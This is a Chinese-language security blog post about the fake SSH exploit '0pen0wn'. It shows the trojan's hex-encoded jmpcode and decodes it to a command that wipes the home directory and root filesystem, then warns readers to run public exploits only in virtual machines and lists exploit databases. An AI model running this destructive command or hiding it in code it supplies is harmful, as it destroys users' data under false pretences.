Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

螳螂捕蟬黃雀在後,公共漏洞 OpenOwn

本來是針對SSH的漏洞攻擊程式,實際上的效果非常有趣…

if (geteuid()) {
  puts("Root is required for raw sockets, etc."); return 1;
}

他需要 root 權限!?

繼續往下翻可以看到 jmpcode

\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f \x64\x65\x76\x2f\x6e\x75\x6c\x6c\x6c\x6c \x26

實際上可以用 python print 出來後變成

rm -rf ~ /* 2> /dev/null &

他把 你 ~ 下的所有檔案都給刪除 …. 所以網路上的漏洞利用資源,必須要在虛擬環境跑唷!

那有哪些資源可以去查呢?

漏洞利用的資源

Exploit Database

https://www.exploit-db.com/

由 Offensive Security 維護,有專門的人員會審核你提供的漏洞。

SecurityFocus

有 BugTraq (公開mail,包含安全漏洞)、漏洞資料庫、Email 列表的網站。

不過大致上又去查了一些資源,感覺是歷經過一波三折的網站…

https://www.ithome.com.tw/news/142299

PacketStorm

提供安全訊息的網站~

https://packetstormsecurity.com/

參考

http://blog.lenss.nl/2009/07/0pen0wn-c-what-a-joke/

Back To Top
error: 內容被保護 !!
Buy Me A Coffee
歡迎贊助 sectools.tw 讓這個網站更好~!